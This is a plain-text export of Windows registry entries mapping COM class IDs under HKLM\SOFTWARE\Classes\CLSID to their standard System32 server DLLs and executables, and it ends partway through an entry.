HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c57a6066-66a3-4d91-9eb9-41532179f0a5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c5872cfd-52d1-4494-aa0d-22d42bbb2e30}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C58BD103-E87F-4B78-A0FA-7A5C95970EE2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\DiagCpl.dll,-15#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\DiagCpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\DiagCpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\DiagCpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C591F150-4106-4141-B5C1-30B2101453BD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmkvsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C5B454CD-3CA1-4b3a-A1D0-2CB5CD6BD985}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C5E2E36E-0D2D-4FAC-A9F4-DDAD14633222}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\NetEventPacketCapture.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C605507B-9613-4756-9C07-E0D74321CB1E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C608E099-892D-4628-B6A2-97257B014E2E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\UIRibbon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C61BFCDF-2E0F-4AAD-A8D7-E06BAFEBCDFE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C624BA95-FBCB-4409-8C03-8CCEEC533EF1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c63382be-7933-48d0-9ac8-85fb46be2fdd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C64B9B66-E53D-4c56-B9AE-FEDE4EE95DB1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C68411EA-1396-48f3-AF98-B7F657E35C20}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c6887882-a444-4b32-960d-e40d0af7851e}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\fodhelper.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FodHelper.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C6FABB24-E332-46FB-BC91-FF331B2D51F0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C6FCE351-A02B-466A-9235-D03134892D25}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C707F6A6-A1F3-45d7-99AA-A2B9491E84AD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C71566F2-561E-11D1-AD87-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c71c41f1-ddad-42dc-a8fc-f5bfc61df957}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c73f6f30-97a0-4ad1-a08f-540d4e9bc7b9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C7657C4A-9F68-40fa-A4DF-96BC08EB3551}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C79A574C-63BE-44b9-801F-283F87F898BE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c79d1575-b8c6-4862-a284-788836518b97}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\display.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c79d1575-b8c6-4862-a284-788836518b97}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\display.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C7A3A54B-0250-11D3-9CD1-00105A1F4801}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\smtpcons.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C7CA6167-2F46-4C4C-98B2-C92591368971}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C7EA3783-77E7-47B7-A68D-A298CC902126}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C7F2FB0F-ACC2-4ddf-9D8A-5E6E80D61024}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c82192ee-6cb5-4bc0-9ef0-fb818773790a}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c827f149-55c1-4d28-935e-57e47caed973}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shwebsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c8367320-6f85-11e0-a1f0-0800200c9a66}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BthTelemetry.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C844C79D-AED8-4DCE-AB25-4D359BED84F8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcRefreshTask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C88A4279-5ADC-4465-927F-6B19777AA5F9} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\srmshell.dll,-9331 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c89e334c-e65f-4156-842e-ea89cec71dea}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fphc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c8c97725-c948-4720-bf0f-e3c2273bfb7d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c8e6f269-b90a-4053-a3be-499afcec98c4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hcproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c9298eef-69dd-4cdd-b153-bdbc38486781}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C947D50F-378E-4FF6-8835-FCB50305244D}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C96401CC-0E17-11D3-885B-00C04F72C717}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C96401CF-0E17-11D3-885B-00C04F72C717}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C96401D1-0E17-11D3-885B-00C04F72C717}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C96C4A08-12E9-4f87-8E6C-3DCF98518E11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C985DF59-A91B-446B-93C3-FB2705D529BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C98F3822-3658-4D75-8A25-6621665ECD56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c99217e2-951d-40b6-b4e4-6af203dadf89}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C992C58D-313B-469c-8202-456FF574FF4E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C9A14CDA-C339-460B-9078-D4DEBCFABE91}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C9E37C15-DF92-4727-85D6-72E5EEB6995A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c9ea5d14-cef7-4e37-851a-8043f0fb74e9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA0AC604-8EF2-448A-AE97-62A2C2CC3C46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA116708-1727-4E71-93F5-CA43081DC62A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PlayToStatusProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA236752-2E77-4386-B63B-0E34774A413D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\werconcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ca34fe0a-5722-43ad-af23-05f7650257dd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA38D8DA-C75D-11D1-8F99-00600895E7D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA38D8DB-C75D-11D1-8F99-00600895E7D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA3FDCA2-BFBE-4eed-90D7-0CAEF0A1BDA1}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ca47b0ae-6f7b-4aeb-8d57-24b3f2aa3d44}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ca52a260-24fa-457a-8a17-119f4f505874}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ca767aa8-9157-4604-b64b-40747123d5f2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\regidle.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CA80BE9F-02DB-4B14-9B52-A72D27B5FBF5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ca8c87c1-929d-45ba-94db-ef8e6cb346ad} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\oobe\useroobe.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAA1B979-07A6-439C-A38C-2BE2B99C3B4A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAC59BFB-5547-456C-80D8-F6428C8F5456}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CACA7238-3C7E-4a25-AD73-DE1A4F8C7214}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\werconcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cb0eed72-a1ee-4df3-94c8-b1022bf900b4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB18B8D1-12E4-4AFD-886E-94AEFE1C70D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB1DFE3A-EDFF-4d1f-867D-8ADB02926F4B} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-30309 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB1DFE3A-EDFF-4d1f-867D-8ADB02926F4B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB35832D-0C2C-41A9-84E1-A7CD1E0C6254}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB39A782-E5E4-11D1-8CC0-00C04FC3261D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB46E850-FC2F-11D2-B126-00805FC73204}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\stclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB6E2B90-25FA-4F08-B46C-696F5A2B6CA5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sppwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cb82ea12-9f71-446d-89e1-8d0924e1256e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovslegacy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB8C13E4-62B5-4C96-A48B-6BA6ACE39C76}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CBD51D89-C22E-4388-A553-FFE638C76E36}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC2EB4A6-2558-43E2-860A-552196F58157}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC3FA696-93B8-4745-B935-0599ACB97747}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC48A47F-EFD6-4925-A515-28C40C5A78B6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC58989A-EB4A-41B6-9654-163C73CF6B11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MSAProfileNotificationHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC6D9715-F553-4299-B2CE-6C7851FAA03A}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\browser_broker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC6EEFFB-43F6-46c5-9619-51D571967F7D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shwebsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC6F1005-CAE0-4892-B602-65A5FD7EC2D6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC89BA65-661C-494a-85C0-5D697DFEB30C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CC9072AB-C000-49D8-A5AA-00266C8DBB9B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCAEAA6D-3A50-488F-A664-5FACF424BC46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCB38336-0B46-4153-BF74-6EA9A8C07EDF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\prauthproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCBA37FC-982B-433B-8AC2-455E616A8559}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ccc63ae1-56a5-4f9c-abe8-e55674f0c0a6}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCDEDADE-AE23-47f3-A588-B09A05CA1A00}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\diagcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCEC11F2-00C4-4266-9932-B9E49442711E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CCF75159-F7DA-4763-B10C-7A13F92DF226}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\SmartCardBackgroundPolicy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD184336-9128-11D1-AD9B-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD1ABFC8-6C5E-4A8D-B90B-2A3B153B886D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cd3aa379-93f4-421b-9802-aeab68b06771}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tsmf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cd4b7782-eb37-4bfe-b9ce-685f634a08dc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdengin2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD6C7868-5864-11D0-ABF0-0020AF6B0B7A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dmocx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD70A734-B6DB-4588-9813-FF2E37A4661F} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\wkspbrokerAx.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD70A734-B6DB-4588-9813-FF2E37A4661F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wkspbrokerAx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CD764A50-D1BD-453E-BE7E-8230F6C1F4BB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CDBEC9C0-7A68-11D1-88F9-0080C7D771BF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CDC7B0EB-EE28-4914-9128-64689D3F34F0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CDC82860-468D-4d4e-B7E7-C298FF23AB2C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CE2BB7DC-73F3-482F-90B6-5BFAA04D0157}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CE510457-55EC-4f86-91BE-323BC91AC34F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cee8ccc9-4f6b-4469-a235-5a22869eef03} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\pnpxassocprx.dll,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ceefea1b-3e29-4ef1-b34c-fec79c4f70af}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ceff45ee-c862-41de-aee2-a022c81eda92}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF0E916A-DA25-49CA-A264-1D41C009EED0}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF2CF428-325B-48d3-8CA8-7633E36E5A32}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdrm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF3D2E50-53F2-11D2-960C-00C04F8EE628}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiutils.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF948561-EDE8-11CE-941E-008029004347}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sysmon.ocx HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFC399AF-D876-11D0-9C10-00C04FC99C8E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFC44584-E947-47fe-B9C4-99168114C866}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFC81939-3886-4ACF-9692-DA58037AE716}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetsrc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFCCC7A0-A282-11D1-9082-006008059382}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cfd82661-9b9e-4c87-9dcb-e0fd11681b44}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{cfd82661-9b9e-4c87-9dcb-e0fd11681b44}\Instance\PropertySetStorage Schema REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFF49D53-EE51-49F2-A807-7E3DF4EA36E3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CFF9990B-6414-43F1-A526-14EA5EEAFBDA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D02B1F72-3407-48ae-BA88-E8213C6761F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AdmTmpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D02B1F73-3407-48ae-BA88-E8213C6761F1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AdmTmpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D034B02A-093B-46B7-8C75-61B9104C71E9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LockScreenContentHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D049B20C-5DD0-44FE-B0B3-8F92C8E6D080}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D0565000-9DF4-11D1-A281-00C04FCA0AA7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D06342BD-9057-4673-B43A-0E9BBBE99F11}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\pmcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d0b7e02c-e1a3-11dc-81ff-001185ae5e76}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\diagcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d0da2915-3f89-4519-a4ca-5e02528c8ec4}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\playlistfolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{d0da2915-3f89-4519-a4ca-5e02528c8ec4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\playlistfolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32 (Default) REG_EXPAND_SZ 